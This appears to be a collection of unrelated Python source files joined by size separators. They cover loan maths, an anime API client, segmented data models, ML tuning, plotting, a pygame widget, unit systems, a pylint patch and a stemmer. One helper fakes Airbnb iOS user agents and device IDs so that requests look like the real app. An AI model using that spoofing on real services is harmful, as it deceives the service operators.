    terms = year * 12.0
    monthly_rate = rate_percent / 100.0 / 12.0
    # Zero interest: simply split the principal evenly across all terms.
    if monthly_rate == 0:
        return principle / terms
    z = 1 + monthly_rate
    growth = z ** terms
    return principle * growth * (z - 1) / (growth - 1)
def calculate_principle(pmt, years, rate_percent):
    """Loan principal that a monthly payment of ``pmt`` services over
    ``years`` years at the given annual percentage rate (0% supported)."""
    terms = years * 12.0
    monthly_rate = (rate_percent / 100.0) / 12.0
    z = 1 + monthly_rate
    # Zero interest: the principal is just the sum of all payments.
    if z == 1:
        return pmt * terms
    growth = z ** terms
    return (growth - 1) * pmt / ((z - 1) * growth)
def calculate_years(principle, pmt, rate_percent):
    """Years needed to pay off ``principle`` with monthly payments of
    ``pmt`` at the given annual percentage rate.

    Fixes: the 0% case is handled explicitly (the closed-form formula
    divides by log(1 + 0) == 0), matching the zero-rate special cases of
    the sibling functions; an uncovering payment raises a clear ValueError
    instead of an opaque "math domain error" (same exception type).
    """
    monthly_rate = (rate_percent / 100.0) / 12.0
    if monthly_rate == 0:
        # No interest: number of terms is just principal / payment.
        return principle / pmt / 12.0
    if pmt <= principle * monthly_rate:
        raise ValueError("payment does not cover the interest: loan is never repaid")
    top_part = log(pmt) - log(pmt - principle * monthly_rate)
    bottom_part = log(1 + monthly_rate)
    return top_part / bottom_part / 12.0
def number_format(num, places=0):
    """Format a number with grouped thousands and given decimal places.

    Fix: the hand-rolled grouping loop treated the minus sign as a digit,
    so numbers whose integer part has a multiple of three digits came out
    wrong (e.g. -234 -> "-,234").  The format-spec thousands separator
    handles the sign correctly; negative ``places`` still clamps to 0.
    """
    return "{:,.{prec}f}".format(num, prec=max(0, places))
class RealEstateInvestment:
    """A rental property with financing, expense and growth assumptions.

    Percentages are whole numbers (5 means 5%); year numbers are 1-based.
    """

    def __init__(self, price, years, apr, monthly_expense=0, annual_expense_percent=0, appreciation=0, inflation=0, one_time_expense=0, down_payment=0, rent=0):
        # Everything is kept as float so all downstream math is float math.
        self.price = float(price)
        self.years = float(years)
        self.apr = float(apr)
        self.monthly_expense = float(monthly_expense)
        self.annual_expense_percent = float(annual_expense_percent)
        self.appreciation = float(appreciation)
        self.inflation = float(inflation)
        self.one_time_expense = float(one_time_expense)
        self.down_payment = float(down_payment)
        self.rent = float(rent)

    def get_noi(self, yr=1):
        """Net operating income for year ``yr``; the down payment and
        one-time costs are charged against year 1 only."""
        upfront = (self.down_payment + self.one_time_expense) if yr == 1 else 0
        outgo = upfront + self.get_annual_expense(yr) + self.get_mortgage_payment() * 12
        return self.get_rent(yr) * 12 - outgo

    def get_monthly_expense(self, yr=1):
        """Monthly running costs, grown with inflation from year 1."""
        inflation_factor = 1 + self.inflation / 100.0
        return self.monthly_expense * inflation_factor ** (yr - 1)

    def get_annual_expense(self, yr=1):
        """Percentage-of-value costs plus the monthly extras.
        NOTE(review): the monthly expense is added once, not x12 — confirm
        whether that is intended."""
        percent_part = self.get_asset_value(yr) * self.annual_expense_percent / 100
        return percent_part + self.get_monthly_expense(yr)

    def get_asset_value(self, yr=1):
        """Property value in year ``yr`` after appreciation."""
        return self.price * (1 + self.appreciation / 100) ** (yr - 1)

    def get_rent(self, yr=1):
        """Monthly rent in year ``yr``, grown with inflation."""
        return self.rent * (1 + self.inflation / 100.0) ** (yr - 1)

    def get_mortgage_payment(self):
        """Monthly mortgage payment on the financed part of the price."""
        loan = self.price - self.down_payment
        return calculate_monthly_payment(loan, self.years, self.apr)
| 3,162 | 1,197 |
import requests
import json
from Sakurajima.models import base_models as bm
class RecommendationEntry(object):
    """One entry of an anime recommendation list.

    Holds the metadata returned by the API plus enough request state
    (headers, cookies, API URL) to fetch the full Anime object on demand.
    """

    def __init__(self, data_dict, headers, cookies, api_url):
        self.__headers = headers
        self.__cookies = cookies
        self.__API_URL = api_url
        # Missing keys simply become None.
        self.title = data_dict.get("title")
        self.episodes_max = data_dict.get("episodes_max")
        self.type = data_dict.get("type")
        self.anime_id = data_dict.get("detail_id")
        self.cover = data_dict.get("cover")
        self.airing_start = data_dict.get("airing_start")
        self.recommendations = data_dict.get("recommendations")
        self.d_status = data_dict.get("d_status")
        self.has_special = data_dict.get("hasSpecial")
        self.progress = data_dict.get("progress")
        self.cur_episodes = data_dict.get("cur_episodes")

    def __repr__(self):
        return f"<RecommendationEntry: {self.title}>"

    def __post(self, data):
        # POST to the API and decode the JSON response body.
        with requests.post(
            self.__API_URL, headers=self.__headers, json=data, cookies=self.__cookies
        ) as response:
            return json.loads(response.text)

    def get_anime(self):
        """Fetch the full Anime object for this recommendation."""
        payload = {
            "controller": "Anime",
            "action": "getAnime",
            "detail_id": str(self.anime_id),
        }
        return bm.Anime(
            self.__post(payload)["anime"],
            headers=self.__headers,
            cookies=self.__cookies,
            api_url=self.__API_URL,
        )
| 1,544 | 490 |
"""Events separate segements of data. A model is fitted to each segment independently"""
import numpy as np
class InvalidPeriod(Exception):
    """Raised when a period index exceeds the number of available segments."""
class event(object):
    """A point in time that splits the data into independently modelled segments."""
    def __init__(self, date):
        # Comparable date value at which a new segment begins.
        self.date = date
def period_range(min_date, max_date, events, index):
    """Return the {'from', 'to'} boundary dates of segment *index*.

    The boundaries are the data extremes plus every event date, sorted;
    segment *index* spans consecutive boundaries. Raises InvalidPeriod when
    *index* exceeds the number of segments (len(events) + 1 in total).
    """
    if index > len(events):
        raise InvalidPeriod('Not enough events to generate period %s' % index)
    boundaries = [min_date, max_date] + [e.date for e in events]
    boundaries.sort()
    return {'from': boundaries[index], 'to': boundaries[index + 1]}
def period_data(data, events, i):
    """Return the subset of *data* rows that belong to segment *i*.

    Rows are selected on the structured field ``data['date']``: inclusive of
    the lower boundary, exclusive of the next event's date (the final segment
    is inclusive of the maximum date).
    """
    lo, hi = np.min(data['date']), np.max(data['date'])
    # Validates the index; raises InvalidPeriod when i is out of range.
    period_range(lo, hi, events, i)
    if i == 0:
        after_start = data['date'] >= lo
    else:
        after_start = data['date'] >= events[i - 1].date
    if i == len(events):
        before_end = data['date'] <= hi
    else:
        before_end = data['date'] < events[i].date
    return data[after_start & before_end]
def periods(data, events, model):
    """Generate a list of model instances for each subset of data"""
    return [model(period_data(data, events, i)) for i in range(len(events) + 1)]
class event_model(object):
    """Fits the given data to the given model but allows for events to be added
    which segment the modelling.

    Each segment between consecutive events is fitted independently; predictions
    and simulations are computed per segment and concatenated in date order.
    """
    def __init__(self, data, model):
        # BUG FIX: `model` was referenced below but never accepted as a
        # parameter, so construction always raised NameError. The demo in
        # __main__ calls event_model(data, Constant) with two arguments.
        # `model` is a factory: called with a data subset, returns a fitted model.
        self.model = model
        self.data = data
        self.events = []
        self._recalculate()
    def _recalculate(self):
        """Regenerate all internal models based on event dates and saved input data."""
        self.periods = periods(self.data, self.events, self.model)
    def add_event(self, ev):
        """Register a new event (kept sorted by date) and refit every segment."""
        self.events.append(ev)
        self.events.sort(key=lambda x: x.date)
        self._recalculate()
    def prediction(self, independent_data):
        """Concatenated per-segment predictions for *independent_data*."""
        for i in range(len(self.periods)):
            p_data = period_data(independent_data, self.events, i)
            p_pred = self.periods[i].prediction(p_data)
            if i == 0:
                result = p_pred
            else:
                result = np.concatenate((result, p_pred))
        return result
    def simulation(self, independent_data):
        """Concatenated per-segment simulations for *independent_data*."""
        for i in range(len(self.periods)):
            p_data = period_data(independent_data, self.events, i)
            p_sim = self.periods[i].simulation(p_data)
            if i == 0:
                result = p_sim
            else:
                result = np.concatenate((result, p_sim))
        return result
    def residuals(self, independent_data):
        """Observed consumption minus model prediction, row-aligned with input."""
        pred = self.prediction(independent_data)
        return independent_data['consumption'] - pred
    def parameters(self):
        """Fitted parameters of each segment's model, in date order."""
        return [p.parameters() for p in self.periods]
if __name__ == "__main__":
    # Demo / smoke test: fit a Constant model to random data split by 8 events
    # and plot data, residuals and prediction.
    import matplotlib.pyplot as plt
    from ConsumptionModels import Constant, TwoParameterModel
    from DataAccess import RandomDataFactory
    f = RandomDataFactory()
    data = f.randomData(1000)
    em = event_model(data, Constant)
    # Segment the data with evenly spaced events every 200000 date units.
    for d in range(8):
        em.add_event(event(200000.0 * (d + 1)))
    pred = em.prediction(data)
    res = em.residuals(data)
    # print em.parameters()
    plt.plot(data['date'], data['consumption'])
    plt.plot(data['date'], res)
    plt.plot(data['date'], pred)
    plt.show()
| 3,620 | 1,140 |
from sklearn.linear_model import LogisticRegression
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import StandardScaler
import numpy as np
from .param_tuning import ParamTuning
class LogisticRegressionTuning(ParamTuning):
    """
    Parameter-tuning class for logistic-regression classification.

    (The original docstring said "support vector classification", which does
    not match the Pipeline below — corrected here.)
    """
    # Common constants
    SEED = 42  # default random seed
    SEEDS = [42, 43, 44, 45, 46, 47, 48, 49, 50, 51]  # default list of random seeds
    CV_NUM = 5  # default number of cross-validation folds used during optimization
    # Estimator instance (pipeline: standardization + logistic regression)
    ESTIMATOR = Pipeline([("scaler", StandardScaler()), ("logr", LogisticRegression())])
    # Default fit-time parameters
    FIT_PARAMS = {}
    # Default metric maximized during optimization ('neg_log_loss', 'roc_auc', 'roc_auc_ovr', ...)
    SCORING = 'neg_log_loss'
    # Parameters excluded from optimization
    NOT_OPT_PARAMS = {'penalty': 'l2',  # regularization penalty ('l1', 'l2', 'elasticnet')
                      'solver': 'lbfgs'  # solver used for fitting ('newton-cg', 'lbfgs', 'liblinear', 'sag', 'saga')
                      }
    # Grid-search parameter grid
    CV_PARAMS_GRID = {'C': np.logspace(-2, 3, 21).tolist()  # regularization strength C (small -> underfit, large -> overfit)
                      }
    # Random-search parameters
    N_ITER_RANDOM = 25  # number of random-search trials
    CV_PARAMS_RANDOM = {'C': np.logspace(-2, 3, 26).tolist()
                        }
    # Bayesian-optimization parameters
    N_ITER_BAYES = 20  # number of BayesianOptimization trials
    INIT_POINTS = 5  # number of initial random observations for BayesianOptimization
    ACQ = 'ei'  # BayesianOptimization acquisition function (https://ohke.hateblo.jp/entry/2018/08/04/230000)
    N_ITER_OPTUNA = 25  # number of Optuna trials
    BAYES_PARAMS = {'C': (0.01, 1000)
                    }
    INT_PARAMS = []
    # Parameter ranges for the validation curves
    VALIDATION_CURVE_PARAMS = {'C': np.logspace(-3, 4, 15).tolist()
                               }
    # Axis scale per parameter for validation-curve plots ('linear', 'log')
    PARAM_SCALES = {'C': 'log',
                    'l1_ratio': 'linear'
                    }
    def _not_opt_param_generation(self, src_not_opt_params, seed, scoring):
        """
        Generate the non-tuned parameters (e.g. inject the random seed; for some
        estimators this hook also sets things like `probability` for log-loss).

        Parameters
        ----------
        src_not_opt_params : Dict
            Non-tuned parameters before processing
        seed : int
            Random seed
        scoring : str
            Metric maximized during optimization
        """
        # Inject the seed only when the estimator exposes a 'random_state' argument.
        # NOTE(review): mutates src_not_opt_params in place as well as returning it.
        if 'random_state' in src_not_opt_params:
            src_not_opt_params['random_state'] = seed
        return src_not_opt_params
import os
# Point matplotlib's config/cache at a writable folder (must be set before
# matplotlib is imported, e.g. in sandboxed hosting environments).
os.environ['MPLCONFIGDIR'] = os.getcwd() + "/configs/"
import matplotlib
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
import numpy as np
df = pd.read_csv('medical_examination.csv')
# BMI (weight / height_m^2) above 25 counts as overweight (1), otherwise 0.
df['overweight'] = (df['weight'] / (df['height']/100)**2).apply(lambda x: 1 if x > 25 else 0)
# Normalize cholesterol/gluc: 1 (normal) -> 0 (good); 2 or 3 (elevated) -> 1 (bad).
df['cholesterol'] = df['cholesterol'].apply(lambda x: 0 if x == 1 else 1)
df['gluc'] = df['gluc'].apply(lambda x: 0 if x == 1 else 1)
def draw_cat_plot():
    """Draw and save a categorical count plot of the binary risk features,
    faceted by the 'cardio' outcome. Returns the matplotlib Figure.
    """
    # Reshape to long format: one (variable, value) row per feature per patient.
    # BUG FIX: the original computed the same melt twice and immediately
    # discarded the first result; the duplicate call was removed.
    df_cat = pd.melt(df, var_name='variable',
                     value_vars=['active', 'alco', 'cholesterol', 'gluc', 'overweight', 'smoke'],
                     id_vars='cardio')
    # Draw the catplot with 'sns.catplot()'
    fig = sns.catplot(data=df_cat, kind="count", x="variable", hue="value",
                      col="cardio").set_axis_labels("variable", "total")
    # Unwrap the bare Figure from the FacetGrid so callers get a Figure object.
    fig = fig.fig
    fig.savefig('catplot.png')
    return fig
def draw_heat_map():
    """Draw and save a correlation heatmap of the cleaned data. Returns the Figure."""
    # Clean the data: drop rows where diastolic exceeds systolic pressure or
    # where height/weight fall outside the 2.5th-97.5th percentiles.
    df_heat = df[(df['ap_lo']<=df['ap_hi']) &
    (df['height'] >= df['height'].quantile(0.025))&
    (df['height'] <= df['height'].quantile(0.975))&
    (df['weight'] >= df['weight'].quantile(0.025))&
    (df['weight'] <= df['weight'].quantile(0.975))
    ]
    corr = df_heat.corr()
    # Mask the upper triangle so each correlation is shown only once.
    mask = np.triu(corr)
    fig, ax = plt.subplots(figsize=(7, 5))
    sns.heatmap(corr,mask=mask, fmt='.1f',vmax=.3, linewidths=.5,square=True, cbar_kws = {'shrink':0.5},annot=True, center=0)
    fig.savefig('heatmap.png')
    return fig
| 1,578 | 641 |
import pygame
from gui.guielement import GuiElement
HORIZONTAL = 0
VERTICAL = 1
class GuiScrollbar(GuiElement):
    """
    scrollbar / slider

    Draggable bar whose position maps linearly onto a value in [0, 1].
    Supports horizontal and vertical orientation; an optional callback
    (registered via connect()) fires when the user releases the bar.
    """
    def __init__(self, x, y, width, height, fontObj, value=0.0, orientation=HORIZONTAL, barLength=30):
        GuiElement.__init__(self, x, y, width, height, fontObj)
        self._value = value          # current position; setValue clamps to [0, 1]
        self._orientation = orientation
        self._barLength = barLength  # pixel length of the draggable bar
        self.setEventTypes(pygame.MOUSEBUTTONDOWN, pygame.MOUSEBUTTONUP, pygame.MOUSEMOTION)
        self._grabbed = False        # True while the user is dragging the bar
        self._func = None            # optional release callback (set via connect)
    def getValue(self):
        """Return the current value in [0, 1]."""
        return self._value
    def setValue(self, value):
        """Set the current value, clamped to the [0, 1] range."""
        self._value = min(max(value, 0), 1)
    def connect(self, func, *params):
        """Register func(*params) to be invoked when the bar is released.

        Returns self so the call can be chained after construction.
        """
        self._func = func
        self._params = params
        return self
    def update(self, t):
        # Nothing animates over time.
        pass
    def canHandleEvent(self, event):
        return GuiElement.canHandleEvent(self, event)
    def handleEvent(self, event):
        """Process a mouse event; return True when the event was consumed."""
        if event.type == pygame.MOUSEBUTTONDOWN and event.button == 1:
            if self._aabb.contains(*pygame.mouse.get_pos()):
                self._grabbed = True
                return True
        elif event.type == pygame.MOUSEBUTTONUP and event.button == 1:
            if self._grabbed:
                self._grabbed = False
                # FIX (idiom): identity comparison against None ('is not'),
                # not '!=', which can misfire for objects overriding __eq__.
                if self._func is not None:
                    self._func(*self._params)
                return True
        elif event.type == pygame.MOUSEMOTION:
            if self._grabbed:
                # Map the cursor (centered on the bar) onto the [0, 1] range.
                # NOTE(review): assumes width/height > barLength, otherwise this
                # divides by zero — confirm against callers.
                if self._orientation == HORIZONTAL:
                    self.setValue(
                        (event.pos[0] - self._barLength / 2.0 - self.getX()) / (self.getWidth() - self._barLength))
                else:
                    self.setValue(
                        (event.pos[1] - self._barLength / 2.0 - self.getY()) / (self.getHeight() - self._barLength))
                return True
        return False
    def draw(self, screen):
        """Render the track background, guide line and bar onto *screen*."""
        screen.fill((50, 50, 50), self.getRect())
        if self._orientation == HORIZONTAL:
            y = self.getY() + self.getHeight() / 2.0 - 1
            screen.fill((255, 255, 255), (self.getX(), y, self.getWidth(), 2))
            barX = self.getX() + self._value * (self.getWidth() - self._barLength)
            screen.fill((100, 200, 255), (barX, self.getY(), self._barLength, self.getHeight()))
        else:
            x = self.getX() + self.getWidth() / 2.0 - 1
            screen.fill((255, 255, 255), (x, self.getY(), 2, self.getHeight()))
            barY = self.getY() + self._value * (self.getHeight() - self._barLength)
            screen.fill((100, 200, 255), (self.getX(), barY, self.getWidth(), self._barLength))
| 2,785 | 965 |
# -*- coding: utf-8 -*-
"""
Naturalunit system.
The natural system comes from "setting c = 1, hbar = 1". From the computer
point of view it means that we use velocity and action instead of length and
time. Moreover instead of mass we use energy.
"""
# FIX: removed a duplicated '# -*- coding: utf-8 -*-' line (a coding
# declaration is only honored on the first two lines of a file).
from __future__ import division
from sympy.physics.unitsystems.dimensions import Dimension, DimensionSystem
from sympy.physics.unitsystems.units import Unit, Constant, UnitSystem
from sympy.physics.unitsystems.prefixes import PREFIXES, prefix_unit
# base dimensions
action = Dimension(name="action", symbol="A", length=2, mass=1, time=-1)
energy = Dimension(name="energy", symbol="E", length=2, mass=1, time=-2)
velocity = Dimension(name="velocity", symbol="V", length=1, time=-1)
# derived dimensions
length = Dimension(name="length", symbol="L", length=1)
mass = Dimension(name="mass", symbol="M", mass=1)
time = Dimension(name="time", symbol="T", time=1)
acceleration = Dimension(name="acceleration", length=1, time=-2)
momentum = Dimension(name="momentum", mass=1, length=1, time=-1)
force = Dimension(name="force", symbol="F", mass=1, length=1, time=-2)
power = Dimension(name="power", length=2, mass=1, time=-3)
frequency = Dimension(name="frequency", symbol="f", time=-1)
dims = (length, mass, time, momentum, force, energy, power, frequency)
# dimension system
natural_dim = DimensionSystem(base=(action, energy, velocity), dims=dims,
                              name="Natural system")
# base units
hbar = Constant(action, factor=1.05457266e-34, abbrev="hbar")
eV = Unit(energy, factor=1.60219e-19, abbrev="eV")
c = Constant(velocity, factor=299792458, abbrev="c")
# all SI-prefixed variants of the electronvolt (keV, MeV, GeV, ...)
units = prefix_unit(eV, PREFIXES)
# unit system
natural = UnitSystem(base=(hbar, eV, c), units=units, name="Natural system")
| 1,785 | 617 |
import random
import uuid
import os
class RandomRequest(object):
    """Helpers that fabricate randomized request-identity values (user agent,
    device id, UUID) from bundled version lists."""
    @classmethod
    def get_random_user_agent(cls):
        """Build an Airbnb iOS user-agent string from the bundled version files."""
        base_dir = os.path.dirname(os.path.realpath(__file__))
        with open(os.path.join(base_dir, 'files/supported_ios_versions.txt')) as version_file:
            ios_versions = version_file.read().splitlines()
        with open(os.path.join(base_dir, 'files/airbnb_versions.txt')) as version_file:
            airbnb_versions = version_file.read().splitlines()
        return "Airbnb/{} iPhone/{} Type/Phone".format(random.choice(airbnb_versions), random.choice(ios_versions))
    @classmethod
    def get_random_udid(cls):
        """Return a 40-character random lowercase hexadecimal device id."""
        return ''.join(random.choice("0123456789abcdef") for _ in range(40))
    @classmethod
    def get_random_uuid(cls):
        """Return a random version-4 UUID string in upper case."""
        return str(uuid.uuid4()).upper()
| 816 | 279 |
from typing import Union
# Public API of this module: only the `num` alias is exported.
__all__ = [
    'num',
]
# Numeric scalar alias: a value that may be either an int or a float.
num = Union[int, float]
| 76 | 30 |
from pylint.reporters.json import JSONReporter
def json_reporter_handle_message(self, msg):
    """Manage message of different type and in the context of path.

    Serializes every field needed for text-template rendering, not just the
    subset the stock JSONReporter keeps.
    """
    fields = ('path', 'abspath', 'line', 'column', 'module', 'obj',
              'msg', 'msg_id', 'symbol', 'C', 'category')
    self.messages.append({field: getattr(msg, field) for field in fields})
# Monkey-patch pylint's JSONReporter so collected messages carry the extra
# fields (path/column/C/...) that text templates may reference.
JSONReporter.handle_message = json_reporter_handle_message
def output_lint_result(lint_result, msg_template):
    """Print pylint messages in the classic text layout.

    *lint_result* is a list of message dicts (as collected by the patched
    JSONReporter); *msg_template* is a str.format template rendered with each
    message's fields. An empty result prints nothing.
    """
    if not lint_result:
        # FIX: the original indexed lint_result[0] unconditionally and raised
        # IndexError when there were no messages.
        return
    lint_module = lint_result[0]['module']
    if lint_module:
        print("************* Module {module}".format(module=lint_module))
    else:
        print("************* ")
    for msg in lint_result:
        print(msg_template.format(**msg))
| 867 | 283 |
from nltk.stem import SnowballStemmer
from nltk.stem.api import StemmerI
import nltk
import json
class ParticleStemmer(SnowballStemmer):
    """Snowball stemmer augmented with a hand-curated special-word table and a
    suffix-rewrite pass that conflates derivationally related forms (e.g.
    'science'/'scientist' -> 'scient') beyond what Snowball produces.
    """
    def __init__(self, language="english", ignore_stopwords=False, suffix_rule_list={}):
        # NOTE(review): mutable default argument ({}) — safe only because it is
        # never mutated here (only read via .update below); confirm.
        super().__init__(language=language, ignore_stopwords=ignore_stopwords)
        if language == "english":
            # Override Snowball's special-word map so these exact surface forms
            # stem to the shared roots on the right-hand side.
            self.stemmer._EnglishStemmer__special_words.update({
                "experiment":"experiment",
                "experimented":"experiment",
                "experimenting":"experiment",
                "experiments":"experiment",
                'organization': 'organiz',
                "organization's": 'organiz',
                'organizational': 'organiz',
                'organizationally': 'organiz',
                'organizations': 'organiz',
                'organize': 'organiz',
                'organized': 'organiz',
                'organizer': 'organiz',
                'organizers': 'organiz',
                'organizes': 'organiz',
                'organizing': 'organiz',
                'science': 'scient',
                'sciences': 'scient',
                'scientific': 'scient',
                'scientifically': 'scient',
                'scientist': 'scient',
                'scientistic': 'scient',
                'scientists': 'scient',
                'animal': 'animal',
                'animalism': 'animal',
                'animalistic': 'animal',
                'animalities': 'animal',
                'animality': 'animal',
                'animals': 'animal',
                'customer': 'customer',
                'ratability': 'rate',
                'ratable': 'rate',
                'ratably': 'rate',
                'rate': 'rate',
                'rateable': 'rate',
                'rateably': 'rate',
                'rated': 'rate',
                'rater': 'rate',
                'raters': 'rate',
                'rates': 'rate',
                'rating': 'rate',
                'ratings': 'rate',
                'ratio': 'rate',
                'ratios': 'rate',
                'ration': 'ration',
                'rations': 'ration',
                'rationed': 'ration',
                'rationing': 'ration',
                'ratification': 'ratifi',
                'ratified': 'ratifi',
                'ratifier': 'ratifi',
                'ratifiers': 'ratifi',
                'ratifies': 'ratifi',
                'ratify': 'ratifi',
                'ratifying': 'ratifi',
                'rational': 'rational',
                'rationale': 'rational',
                'rationales': 'rational',
                'rationalism': 'rational',
                'rationalist': 'rational',
                'rationalistic': 'rational',
                'rationalistically': 'rational',
                'rationalists': 'rational',
                'rationalities': 'rational',
                'rationality': 'rational',
                'rationalization': 'rational',
                'rationalizations': 'rational',
                'rationalize': 'rational',
                'rationalized': 'rational',
                'rationalizer': 'rational',
                'rationalizers': 'rational',
                'rationalizes': 'rational',
                'rationalizing': 'rational',
                'rationally': 'rational',
                'rationalness': 'rational',
                'rationals': 'rational',
                'ionization': 'ion',
                'ionizer': 'ion',
                'ionizers': 'ion',
                'ionizations': 'ion',
                'chemistry': 'chem',
                'chemistries': 'chem',
                'chemist': 'chem',
                'chemists': 'chem',
                'chemism': 'chem',
                'chemisms': 'chem',
                'stable': 'stabil',
                'stabled': 'stabil',
                'stableness': 'stabil',
                'laboratorial': 'lab',
                'laboratorially': 'lab',
                'laboratorian': 'lab',
                'laboratories': 'lab',
                'laboratory': 'lab',
                'preppie': 'prep',
                'preppies': 'prep',
                'preparation': 'prep',
                'preparations': 'prep',
                'preparatorily': 'prep',
                'preparatory': 'prep',
                'prepare': 'prep',
                'prepared': 'prep',
                'preparedness': 'prep',
                'preparer': 'prep',
                'preparers': 'prep',
                'prepares': 'prep',
                'preparing': 'prep',
                'publication': 'publish',
                'publications': 'publish',
                # NOTE(review): the two 'microfluidiс*' keys below contain a
                # Cyrillic 'с' (U+0441), so real ASCII 'microfluidics' will
                # never match them — confirm whether this is intentional.
                'microfluidiсs': 'microfluid',
                'microfluidiс': 'microfluid',
                'transmissibility': 'transmitt',
                'transmissible': 'transmitt',
                'transmission': 'transmitt',
                'transmissions': 'transmitt',
                'transmissive': 'transmitt',
                'transmitting': 'transmitt',
                'transmitted': 'transmitt',
                'transmit': 'transmitt',
                'transmits': 'transmitt',
                'compliant': 'complianc',
                'compliantly': 'complianc',
                'allergic': 'allergen',
                'allergies': 'allergen',
                'allergin': 'allergen',
                'allergist': 'allergen',
                'allergists': 'allergen',
                'allergology': 'allergen',
                'allergy': 'allergen',
                'reproduction': 'reproduc',
                'reproductions': 'reproduc',
                'reproductive': 'reproduc',
                'reproductively': 'reproduc',
                'reproductiveness': 'reproduc',
                'reproductivity': 'reproduc',
                'filtrable': 'filter',
                'filtrate': 'filter',
                'filtrated': 'filter',
                'filtrates': 'filter',
                'filtrating': 'filter',
                'filtration': 'filter',
                'programmable': 'program',
                'programmability': 'program',
                'programme': 'program',
                'programmata': 'program',
                'programmatic': 'program',
                'programmatically': 'program',
                'programmer': 'program',
                'programmers': 'program',
                'programmes': 'program',
                'formation': 'form',
                'include': 'inclus',
                'includes': 'inclus',
                'including': 'inclus',
                'included': 'inclus',
                'dosage': 'dose',
                'dosages': 'dose',
                'seq':'sequenc',
                'mineral':'mineral',
                'minerals':'mineral',
                'mineralization':'mineral',
                'mineralize':'mineral',
                'mineralized':'mineral',
                'mineralizes':'mineral',
                'mineralizing':'mineral',
                'designate':'designat',
                'designated':'designat',
                'designates':'designat',
                'designating':'designat',
                'designation':'designat',
                'designations':'designat',
                'designative':'designat',
                'designator':'designat',
                'designment':'designat',
                'genesys':'genesys',
                'poly':'poly',
                'sepsis':'sept',
                'fabulist':'fabl',
                'fabulists':'fabl',
                'flautist':'flut',
                'flautists':'flut',
                'hygeist':'hygien',
                'hygieist':'hygien',
                'hygeists':'hygien',
                'hygieists':'hygien',
                'hypothesist':'hypothe',
                'hypothesists':'hypothe',
                'lutanist':'lute',
                'lutanists':'lute',
                'lutenist':'lute',
                'lutenists':'lute',
                'lutist':'lute',
                'lutists':'lute',
                'magisterial':'magist',
                'magisterially':'magist',
                'magisterialness':'magist',
                'magistery':'magist',
                'magistracies':'magist',
                'magistracy':'magist',
                'magistrateship':'magist',
                'magistrature':'magist',
                'mister':'mister',
                'mr':'mister',
                'misters':'mister',
                'mistier':'misti',
                'mistiest':'misti',
                'piano':'pian',
                'pianos':'pian',
                'cellist':'cello',
                'cellists':'cello',
                'orthopaedic':'orthoped',
                'orthopaedics':'orthoped',
                'orthopaedist':'orthoped',
                'orthopaedist':'orthoped',
                'papist':'papa',
                'papistries':'papa',
                'papistry':'papa',
                'papists':'papa',
                'protista':'protist',
                'rapist':'rape',
                'rapists':'rape',
                'scenarist':'scenario',
                'scenarists':'scenario',
                'tourism':'tourist',
                'tourisms':'tourist',
                'admin':'administr',
                'administer':'administr',
                'administered':'administr',
                'administerial':'administr',
                'administering':'administr',
                'administerings':'administr',
                'administers':'administr',
                'administratrices':'administr',
                'administratrix':'administr',
                'characterless':'charact',
                'charactery':'charact',
                'geoscience': 'geoscient',
                'geosciences': 'geoscient',
                'geoscientific': 'geoscient',
                'geoscientifically': 'geoscient',
                'geoscientist': 'geoscient',
                'geoscientistic': 'geoscient',
                'geoscientists': 'geoscient',
                'bioscience': 'bioscient',
                'biosciences': 'bioscient',
                'bioscientific': 'bioscient',
                'bioscientifically': 'bioscient',
                'bioscientist': 'bioscient',
                'bioscientistic': 'bioscient',
                'bioscientists': 'bioscient',
            })
        # Vocabulary used to validate candidate stems produced by the suffix
        # rules below; NOTE(review): requires the NLTK 'words' corpus to be
        # downloaded — confirm deployment environments have it.
        from partstem.word_list import word_list
        self.word_list = word_list
        self.word_list += nltk.corpus.words.words()
        # Expose the augmented stemmer through the public .stem attribute.
        self.stem = self.__stem
        # Suffix rewrite rules applied after Snowball stemming. For a stem
        # ending in <key>, the suffix is stripped when, for some entry in
        # "with", every listed replacement ('+'-separated; '-'-prefixed means
        # "must NOT be a word") yields a known word; "exception" lists stems
        # the rule must never touch.
        self.suffix_rule_list = {
            'ant': {"with": ['ation'], "exception": []},
            'eti': {"with": ['ant', ''], "exception": []},
            'or': {"with": ['ion'], "exception": []},
            'um': {"with": ['a'], "exception": ["medium"]},
            'a': {"with": ['um', 'ary+ '], "exception": ["media"]},
            'ri': {"with": [' -ried', 'er', 'tes'], "exception": []},
            'er': {"with": ['y'], "exception": []},
            'al': {"with": ['us'], "exception": ["animal"]},
            'us': {"with": ['al'], "exception": []},
            'ifi': {"with": ['e'], "exception": ["modifi", "specifi"]},
            'e': {"with": ['ification'], "exception": []},
            'ion': {"with": ['e'], "exception": []},
            'i': {"with": ['e', 'us', 'er', 'y+ ', 'y+ic'], "exception": ["ii"]},
            'si': {"with": ['sis'], "exception": ["genesi"]},
            's': {"with": ['sis'], "exception": ["genes"]},
            't': {"with": ['sis'], "exception": []},
            'z': {"with": ['sis'], "exception": []},
            "ier": {"with": ["ying", ""], "exception": []},
            "abl": {"with": ["e", "es", "ate", "ation", "ed", "en", "ies", ""], "exception": ["stabl", "capabl", "fabl", "arabl", "cabl", "constabl", "decasyllabl", "despicabl", "diabl", "disabl", "effabl", "enabl", "formidabl", "gabl", "gullabl", "impeccabl", "improbabl", "incapabl", "ineffabl", "inevitabl", "inviabl", "invariabl", "viabl", "variabl", "liabl", "probabl", "syllabl", "monosyllabl", "nonstabl", "unstabl", "uncapabl", "nonviabl", "parabl", "peccabl", "polysyllabl", "sabl", "permeabl", "semipermeabl", "tabl", "tenabl", "thermostabl", "timetabl", "unabl", "vegetabl", "vocabl", "worktabl"]},
            "th": {"with": [""], "exception": []},
            "atori": {"with": ["ation"], "exception": []},
            "ori": {"with": ["ion"], "exception": []},
            "ous": {"with": ["y", "", "e", "on", "ity"], "exception": []},
            "ic": {"with": ["", "e"], "exception": ["sonic", "polic", "indic"]},
            "iti": {"with": ["est+ification"], "exception": []},
            "iz": {"with": ["ize", "izate"], "exception": []},
            "at": {"with": ["atic", "ance"], "exception": []},
            'if': {"with": ["ity+est", "e"], "exception": ["modif", "specif"]},
